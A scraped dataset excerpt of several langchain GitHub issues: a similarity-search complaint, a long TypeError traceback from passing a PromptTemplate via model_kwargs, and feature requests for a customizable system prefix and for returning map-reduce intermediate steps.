I've tried every open source VectorStore I could find (FAISS, Chrome, Annoy, DocArray, Qdrant, scikit-learn, etc), they all returned the exact same list.
I also tried making everything lowercase (it did help with other queries, here it didn't).
I also tried with relevancy score (getting 10x as many and sorting myself), which did help in other cases, but not here.
Any suggestion is welcome, especially if the error is on my side.
Thanks! | Similarity search returns random docs, not the ones that contain the specified keywords | https://api.github.com/repos/langchain-ai/langchain/issues/7427/comments | 9 | 2023-07-09T12:31:36Z | 2023-10-14T20:41:00Z | https://github.com/langchain-ai/langchain/issues/7427 | 1,795,381,432 | 7,427 |
[
"hwchase17",
"langchain"
]
| ### System Info
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[15], line 15
12 qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
14 query = "halo"
---> 15 qa.run(query)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:440, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
438 if len(args) != 1:
439 raise ValueError("`run` supports only one positional argument.")
--> 440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/retrieval_qa/base.py:131, in BaseRetrievalQA._call(self, inputs, run_manager)
129 else:
130 docs = self._get_docs(question) # type: ignore[call-arg]
--> 131 answer = self.combine_documents_chain.run(
132 input_documents=docs, question=question, callbacks=_run_manager.get_child()
133 )
135 if self.return_source_documents:
136 return {self.output_key: answer, "source_documents": docs}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:445, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
--> 445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
449 if not kwargs and not args:
450 raise ValueError(
451 "`run` supported with either positional arguments or keyword arguments,"
452 " but none were provided."
453 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/base.py:106, in BaseCombineDocumentsChain._call(self, inputs, run_manager)
104 # Other keys are assumed to be needed for LLM prediction
105 other_keys = {k: v for k, v in inputs.items() if k != self.input_key}
--> 106 output, extra_return_dict = self.combine_docs(
107 docs, callbacks=_run_manager.get_child(), **other_keys
108 )
109 extra_return_dict[self.output_key] = output
110 return extra_return_dict
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/stuff.py:165, in StuffDocumentsChain.combine_docs(self, docs, callbacks, **kwargs)
163 inputs = self._get_inputs(docs, **kwargs)
164 # Call predict on the LLM.
--> 165 return self.llm_chain.predict(callbacks=callbacks, **inputs), {}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:252, in LLMChain.predict(self, callbacks, **kwargs)
237 def predict(self, callbacks: Callbacks = None, **kwargs: Any) -> str:
238 """Format prompt with kwargs and pass to LLM.
239
240 Args:
(...)
250 completion = llm.predict(adjective="funny")
251 """
--> 252 return self(kwargs, callbacks=callbacks)[self.output_key]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:92, in LLMChain._call(self, inputs, run_manager)
87 def _call(
88 self,
89 inputs: Dict[str, Any],
90 run_manager: Optional[CallbackManagerForChainRun] = None,
91 ) -> Dict[str, str]:
---> 92 response = self.generate([inputs], run_manager=run_manager)
93 return self.create_outputs(response)[0]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:102, in LLMChain.generate(self, input_list, run_manager)
100 """Generate LLM result from inputs."""
101 prompts, stop = self.prep_prompts(input_list, run_manager=run_manager)
--> 102 return self.llm.generate_prompt(
103 prompts,
104 stop,
105 callbacks=run_manager.get_child() if run_manager else None,
106 **self.llm_kwargs,
107 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:230, in BaseChatModel.generate_prompt(self, prompts, stop, callbacks, **kwargs)
222 def generate_prompt(
223 self,
224 prompts: List[PromptValue],
(...)
227 **kwargs: Any,
228 ) -> LLMResult:
229 prompt_messages = [p.to_messages() for p in prompts]
--> 230 return self.generate(prompt_messages, stop=stop, callbacks=callbacks, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:125, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
123 if run_managers:
124 run_managers[i].on_llm_error(e)
--> 125 raise e
126 flattened_outputs = [
127 LLMResult(generations=[res.generations], llm_output=res.llm_output)
128 for res in results
129 ]
130 llm_output = self._combine_llm_outputs([res.llm_output for res in results])
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:115, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
112 for i, m in enumerate(messages):
113 try:
114 results.append(
--> 115 self._generate_with_cache(
116 m,
117 stop=stop,
118 run_manager=run_managers[i] if run_managers else None,
119 **kwargs,
120 )
121 )
122 except (KeyboardInterrupt, Exception) as e:
123 if run_managers:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:262, in BaseChatModel._generate_with_cache(self, messages, stop, run_manager, **kwargs)
258 raise ValueError(
259 "Asked to cache, but no cache found at `langchain.cache`."
260 )
261 if new_arg_supported:
--> 262 return self._generate(
263 messages, stop=stop, run_manager=run_manager, **kwargs
264 )
265 else:
266 return self._generate(messages, stop=stop, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:371, in ChatOpenAI._generate(self, messages, stop, run_manager, **kwargs)
363 message = _convert_dict_to_message(
364 {
365 "content": inner_completion,
(...)
368 }
369 )
370 return ChatResult(generations=[ChatGeneration(message=message)])
--> 371 response = self.completion_with_retry(messages=message_dicts, **params)
372 return self._create_chat_result(response)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:319, in ChatOpenAI.completion_with_retry(self, **kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
317 return self.client.create(**kwargs)
--> 319 return _completion_with_retry(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:289, in BaseRetrying.wraps.<locals>.wrapped_f(*args, **kw)
287 @functools.wraps(f)
288 def wrapped_f(*args: t.Any, **kw: t.Any) -> t.Any:
--> 289 return self(f, *args, **kw)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:379, in Retrying.__call__(self, fn, *args, **kwargs)
377 retry_state = RetryCallState(retry_object=self, fn=fn, args=args, kwargs=kwargs)
378 while True:
--> 379 do = self.iter(retry_state=retry_state)
380 if isinstance(do, DoAttempt):
381 try:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:314, in BaseRetrying.iter(self, retry_state)
312 is_explicit_retry = fut.failed and isinstance(fut.exception(), TryAgain)
313 if not (is_explicit_retry or self.retry(retry_state)):
--> 314 return fut.result()
316 if self.after is not None:
317 self.after(retry_state)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:438, in Future.result(self, timeout)
436 raise CancelledError()
437 elif self._state == FINISHED:
--> 438 return self.__get_result()
440 self._condition.wait(timeout)
442 if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:390, in Future.__get_result(self)
388 if self._exception:
389 try:
--> 390 raise self._exception
391 finally:
392 # Break a reference cycle with the exception in self._exception
393 self = None
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:382, in Retrying.__call__(self, fn, *args, **kwargs)
380 if isinstance(do, DoAttempt):
381 try:
--> 382 result = fn(*args, **kwargs)
383 except BaseException: # noqa: B902
384 retry_state.set_exception(sys.exc_info()) # type: ignore[arg-type]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:317, in ChatOpenAI.completion_with_retry.<locals>._completion_with_retry(**kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
--> 317 return self.client.create(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/chat_completion.py:25, in ChatCompletion.create(cls, *args, **kwargs)
23 while True:
24 try:
---> 25 return super().create(*args, **kwargs)
26 except TryAgain as e:
27 if timeout is not None and time.time() > start + timeout:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py:153, in EngineAPIResource.create(cls, api_key, api_base, api_type, request_id, api_version, organization, **params)
127 @classmethod
128 def create(
129 cls,
(...)
136 **params,
137 ):
138 (
139 deployment_id,
140 engine,
(...)
150 api_key, api_base, api_type, api_version, organization, **params
151 )
--> 153 response, _, api_key = requestor.request(
154 "post",
155 url,
156 params=params,
157 headers=headers,
158 stream=stream,
159 request_id=request_id,
160 request_timeout=request_timeout,
161 )
163 if stream:
164 # must be an iterator
165 assert not isinstance(response, OpenAIResponse)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:288, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
--> 288 result = self.request_raw(
289 method.lower(),
290 url,
291 params=params,
292 supplied_headers=headers,
293 files=files,
294 stream=stream,
295 request_id=request_id,
296 request_timeout=request_timeout,
297 )
298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:581, in APIRequestor.request_raw(self, method, url, params, supplied_headers, files, stream, request_id, request_timeout)
569 def request_raw(
570 self,
571 method,
(...)
579 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
580 ) -> requests.Response:
--> 581 abs_url, headers, data = self._prepare_request_raw(
582 url, supplied_headers, method, params, files, request_id
583 )
585 if not hasattr(_thread_context, "session"):
586 _thread_context.session = _make_session()
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:553, in APIRequestor._prepare_request_raw(self, url, supplied_headers, method, params, files, request_id)
551 data = params
552 if params and not files:
--> 553 data = json.dumps(params).encode()
554 headers["Content-Type"] = "application/json"
555 else:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/__init__.py:231, in dumps(obj, skipkeys, ensure_ascii, check_circular, allow_nan, cls, indent, separators, default, sort_keys, **kw)
226 # cached encoder
227 if (not skipkeys and ensure_ascii and
228 check_circular and allow_nan and
229 cls is None and indent is None and separators is None and
230 default is None and not sort_keys and not kw):
--> 231 return _default_encoder.encode(obj)
232 if cls is None:
233 cls = JSONEncoder
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:199, in JSONEncoder.encode(self, o)
195 return encode_basestring(o)
196 # This doesn't pass the iterator directly to ''.join() because the
197 # exceptions aren't as detailed. The list call should be roughly
198 # equivalent to the PySequence_Fast that ''.join() would do.
--> 199 chunks = self.iterencode(o, _one_shot=True)
200 if not isinstance(chunks, (list, tuple)):
201 chunks = list(chunks)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:257, in JSONEncoder.iterencode(self, o, _one_shot)
252 else:
253 _iterencode = _make_iterencode(
254 markers, self.default, _encoder, self.indent, floatstr,
255 self.key_separator, self.item_separator, self.sort_keys,
256 self.skipkeys, _one_shot)
--> 257 return _iterencode(o, 0)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:179, in JSONEncoder.default(self, o)
160 def default(self, o):
161 """Implement this method in a subclass such that it returns
162 a serializable object for ``o``, or calls the base implementation
163 (to raise a ``TypeError``).
(...)
177
178 """
--> 179 raise TypeError(f'Object of type {o.__class__.__name__} '
180 f'is not JSON serializable')
TypeError: Object of type PromptTemplate is not JSON serializable
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.prompts import PromptTemplate
prompt_template = """Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.
Question: {question}
Answer in Italian:"""
PROMPT = PromptTemplate(
template=prompt_template, input_variables=["question"]
)
chain_type_kwargs = {"prompt": PROMPT}
llm = ChatOpenAI(model_name = "gpt-3.5-turbo",temperature=0,model_kwargs=chain_type_kwargs)
qa_chain = load_qa_chain(llm=llm, chain_type="stuff",verbose=True)
qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
query = "halo"
qa.run(query)
### Expected behavior
Hope to use the PromptTemplate in QA | TypeError: Object of type PromptTemplate is not JSON serializable | https://api.github.com/repos/langchain-ai/langchain/issues/7426/comments | 2 | 2023-07-09T10:02:36Z | 2023-10-15T16:04:53Z | https://github.com/langchain-ai/langchain/issues/7426 | 1,795,324,312 | 7,426 |
[
"hwchase17",
"langchain"
]
| ### Feature request
We are using langchain for non-English applications. The prefix for system is hardcoded as "System":
```python
for m in messages:
if isinstance(m, HumanMessage):
role = human_prefix
elif isinstance(m, AIMessage):
role = ai_prefix
elif isinstance(m, SystemMessage):
role = "System"
elif isinstance(m, FunctionMessage):
role = "Function"
elif isinstance(m, ChatMessage):
role = m.role
else:
raise ValueError(f"Got unsupported message type: {m}")
```
The word "System" will appear in the prompt, e.g., when using summary-based memories. A sudden English word is not friendly to non-English LLMs.
### Motivation
Improving multi-language support.
### Your contribution
Sorry. I am probably not capable enough of developing langchain. | Can you make system_prefix customizable? | https://api.github.com/repos/langchain-ai/langchain/issues/7415/comments | 1 | 2023-07-08T22:26:17Z | 2023-10-14T20:09:47Z | https://github.com/langchain-ai/langchain/issues/7415 | 1,795,149,831 | 7,415 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Pipe `intermediate_steps` out of MR chain:
```
# Combining documents by mapping a chain over them, then combining results
combine_documents = MapReduceDocumentsChain(
# Map chain
llm_chain=map_llm_chain,
# Reduce chain
reduce_documents_chain=reduce_documents_chain,
# The variable name in the llm_chain to put the documents in
document_variable_name="questions",
# Return the results of the map steps in the output
return_intermediate_steps=True)
# Define Map=Reduce
map_reduce = MapReduceChain(
# Chain to combine documents
combine_documents_chain=combine_documents,
# Splitter to use for initial split
text_splitter=text_splitter)
return map_reduce.run(input_text=input_doc)
```
Error:
```
ValueError: `run` not supported when there is not exactly one output key. Got ['output_text', 'intermediate_steps'].
```
### Motivation
We want to return the intermediate docs
### Your contribution
Will work on this | Pipe `intermediate_steps` out of map_reduce.run() | https://api.github.com/repos/langchain-ai/langchain/issues/7412/comments | 4 | 2023-07-08T19:14:30Z | 2024-02-09T16:25:54Z | https://github.com/langchain-ai/langchain/issues/7412 | 1,795,070,373 | 7,412 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.